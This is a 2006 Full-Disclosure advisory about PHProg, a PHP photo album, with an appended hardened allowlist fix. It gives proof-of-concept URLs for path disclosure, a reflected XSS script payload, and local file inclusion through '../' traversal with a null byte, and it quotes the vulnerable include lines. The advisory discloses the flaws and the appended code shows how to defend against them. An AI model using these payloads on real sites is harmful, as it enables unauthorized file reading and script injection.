
List:       full-disclosure
Subject:    [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path
From:       "..." <cdg393 () gmail ! com>
Date:       2006-09-11 9:03:49
Message-ID: d2c8d5d80609110203q20a6e932gc7d23f6b431d5293 () mail ! gmail ! com


(11/09/06)

* Vulnerable product: PHProg (PHP photo album)

* Official product site: http://www.PHProg.com/

* Security flaws found:

1] Full path disclosure: http://localhost/PHProg/?id=1&album=cdg393

2] Cross Site Scripting (XSS): http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>

3] Local File Inclusion:
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00

     Line 59        =>              $lang=$_GET['lang'];
     Line 61        =>              include("lang/$lang.php");

* Credits: cdg393 : cdg.new.fr =)




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
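
A hardened form of the include quoted at lines 59 and 61 of the advisory, as an added example that is not part of the original message and not PHProg's own code: the `lang` value is matched against a fixed list before any path is built. The language codes, the `en` default, the function name `resolve_lang_file` and the temporary demo directory are assumptions.

```php
<?php
// Added example, not PHProg code. Language codes and default are assumptions.
declare(strict_types=1);

const ALLOWED_LANGS = ['en', 'fr'];   // assumed set of shipped language files
const DEFAULT_LANG  = 'en';           // assumed fallback

/** Map the untrusted ?lang= value to a file directly inside $langDir. */
function resolve_lang_file($requested, string $langDir): string
{
    // Exact match against a fixed list: "../", NUL bytes and arrays
    // (?lang[]=x) can never equal an allowed code, so they fall back.
    if (!is_string($requested) || !in_array($requested, ALLOWED_LANGS, true)) {
        $requested = DEFAULT_LANG;
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $requested . '.php');
    // Defence in depth: the resolved file must exist directly under lang/.
    if ($base === false || $path === false || dirname($path) !== $base) {
        throw new RuntimeException('language file not found');
    }
    return $path;
}

// Demo on constructed input: a throwaway lang/ directory with two files.
$langDir = sys_get_temp_dir() . '/phprog_demo_' . getmypid() . '/lang';
mkdir($langDir, 0700, true);
foreach (ALLOWED_LANGS as $code) {
    file_put_contents("$langDir/$code.php", "<?php return ['code' => '$code'];");
}

$samples = [                               // constructed request values
    'fr',                                  // legitimate code
    '../../../../../../BOOT.INI' . "\0",   // value from the advisory, URL-decoded
    ['fr'],                                // ?lang[]=fr arrives as an array
    'FR',                                  // wrong case, not on the list
];
foreach ($samples as $value) {
    $strings = include resolve_lang_file($value, $langDir);
    printf("%-45s -> lang/%s.php\n", json_encode($value), $strings['code']);
}

// Remove the demo files again.
array_map('unlink', glob("$langDir/*.php"));
rmdir($langDir);
rmdir(dirname($langDir));
```

Because the check is an exact comparison against known codes, it does not depend on how the PHP version in use treats a NUL byte in a file path.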
